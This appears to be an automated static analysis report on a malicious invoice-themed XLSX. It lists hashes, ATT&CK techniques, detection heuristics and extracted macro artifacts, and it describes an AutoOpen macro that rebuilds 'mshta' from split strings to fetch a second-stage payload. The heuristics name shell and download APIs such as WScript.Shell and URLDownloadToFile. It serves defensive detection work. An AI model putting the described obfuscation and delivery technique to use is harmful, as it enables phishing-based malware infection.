Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 0127ed2d5c88bea1…

MALICIOUS

Office (OOXML) / .XLSX

60.5 KB Created: 2006-10-11 04:02:12 UTC Authoring application: WPS Office 12.0000
MD5: 30f70aa50b3b8186d1f0852bfeb46aa7 SHA-1: 8e606582f75aba27aad87c6a0628fd8d26969e22 SHA-256: 0127ed2d5c88bea1754efc672d6990dab2ea987fa76d6047cf0807b7f8bd9208
168 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1218.004 Client Execution: Mshta T1566.001 Phishing: Spearphishing Attachment

The sample is an OOXML document containing VBA macros. The document body presents itself as an invoice, aligning with the 'SE_INVOICE_LURE' heuristic. The VBA macro uses obfuscated API names, specifically reassembling 'mshta' from split string literals, and the 'AutoOpen' subroutine triggers execution via the 'Shell' function. This script is designed to download and execute a second-stage payload using mshta, likely exploiting the invoice lure to trick the user into enabling macros.

Heuristics 5

  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • External relationship high OOXML_EXTERNAL_REL
    External target in xl/externalLinks/_rels/externalLink2.xml.rels: file:///\\Sskim\최종선적현황\7-9BUY\HS VINA 7-9BUY 최종선적분.xls
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • VBA project inside OOXML medium OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Fake invoice / payment lure low SE_INVOICE_LURE
    Document contains invoice or payment language paired with an action verb — useful context when combined with link, macro, or attachment indicators

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
f5bb5abcb5bb0a57f2b6b51e96f69c0933b1f1c78295a511b6e598fdd448b921		 vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2315 bytes
vbaProject_00.bin
6858f984dbfc9ad7ba196d1209d5df7691a6c97c4f8248e422fd9b6ff08750e1		 vba-project OOXML VBA project: xl/vbaProject.bin 16896 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.